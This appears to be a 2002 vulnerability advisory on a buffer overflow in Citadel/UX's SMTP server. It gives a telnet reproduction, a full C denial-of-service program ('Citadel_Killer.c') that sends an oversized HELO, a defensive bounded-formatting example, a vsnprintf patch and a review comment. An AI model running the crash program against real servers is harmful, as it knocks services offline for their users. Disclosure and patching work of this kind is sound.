12th Mar 2002 [SBWID-5181]
COMMAND
Citadel remote buffer overflow leads to DoS
SYSTEMS AFFECTED
Citadel v5.90??
PROBLEM
xperc posted :
An attacker can execute a denial of service attack against Citadel.
Once the big buffer has been sent, the server is vulnerable.
Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]
[buffer] is around 4096 characters.
/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.
 *
 * by xperc@hotmail.com
 */
#include <stdio.h>
#include <stdlib.h>      /* exit */
#include <string.h>      /* memset, strcat, strlen */
#include <unistd.h>      /* close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#define MAXBUF 8000
#define MAXBUF2 MAXBUF+6
#define RECVBUF 256
#define CIT_SMTP 25
int main(int argc, char *argv[])
{
    int sockfd;
    char msg[RECVBUF],buf[MAXBUF],sendbuf[MAXBUF2];
    struct sockaddr_in target;
    if(argc!=2){
        fprintf(stderr,"Usage: %s target_address\n",*argv);
        exit(-1);
    }
    if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
        perror("socket");
        exit(-1);
    }
    target.sin_family=AF_INET;
    target.sin_port=htons(CIT_SMTP);
    target.sin_addr.s_addr=inet_addr(argv[1]);
    if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
        perror("connect");
        exit(-1);
    }
    /* read the 220 greeting before sending the command */
    if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
        perror("recv");
        exit(-1);
    }
    /* HELO argument of MAXBUF filler bytes, larger than the server's 4096-byte buffer */
    memset(buf,'a',MAXBUF);
    snprintf(sendbuf,sizeof(sendbuf),"helo %s",buf);
    strcat(sendbuf,"\n");
    send(sockfd,sendbuf,strlen(sendbuf),0);
    close(sockfd);
    return 0;
}
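Added example, not part of the original post or the Citadel code: the bounded formatting from the SOLUTION patch with truncation reported to the caller, plus a length check on the incoming command line before it is formatted. The names log_bounded, smtp_line_ok and demo, the "SMTP: %s" format string and the 512-octet limit (taken from RFC 5321) are assumptions; the 4096-byte buffer matches the patch.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUF 4096        /* size of buf[] in the sysdep.c hunk on this page */
#define SMTP_MAX_LINE 512   /* RFC 5321 command-line limit, CRLF included */

/* Hypothetical log formatter: bounded write, truncation reported to caller.
 * Returns 0 = complete, 1 = truncated, -1 = error. */
static int log_bounded(char *out, size_t outsz, const char *format, ...)
{
    va_list ap;
    int n;

    if (outsz == 0) return -1;
    va_start(ap, format);
    n = vsnprintf(out, outsz, format, ap);
    va_end(ap);
    if (n < 0) { out[0] = '\0'; return -1; }
    return (size_t)n >= outsz;
}

/* Hypothetical input check: len is the command length without CRLF. */
static int smtp_line_ok(size_t len)
{
    return len + 2 <= SMTP_MAX_LINE;
}

/* Builds a constructed "helo aaa..." line with n filler bytes and runs both
 * checks. Bit 0: line over the SMTP limit. Bit 1: log message truncated. */
static int demo(size_t n)
{
    static char line[9000], logbuf[LOG_BUF];
    size_t len = 5 + n;
    int rc = 0;

    if (len >= sizeof line) return -1;
    memcpy(line, "helo ", 5);
    memset(line + 5, 'a', n);
    line[len] = '\0';
    if (!smtp_line_ok(len)) rc |= 1;
    if (log_bounded(logbuf, sizeof logbuf, "SMTP: %s", line) == 1) rc |= 2;
    return rc;
}

int main(void)
{
    printf("20: %d  600: %d  8000: %d\n", demo(20), demo(600), demo(8000));
    return 0;
}
```

A line rejected by the length check never needs to reach the formatter; the truncation flag covers any path where it still does.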
SOLUTION
Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];
va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);
if (loglevel <= verbosity) {
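Review bot: the return value of vsnprintf() on the changed line is discarded, so a message longer than the 4096-byte buf is cut silently and the log gives no sign that the input was oversized. Capture it (int n = vsnprintf(buf, sizeof(buf), format, arg_ptr);) and treat n >= sizeof(buf) as truncation, for example by appending a marker or recording the original length, since that is the event an operator would want to see. The bound also covers only this one formatting call; a length limit on the client-supplied string before it reaches this function would address the input side as well.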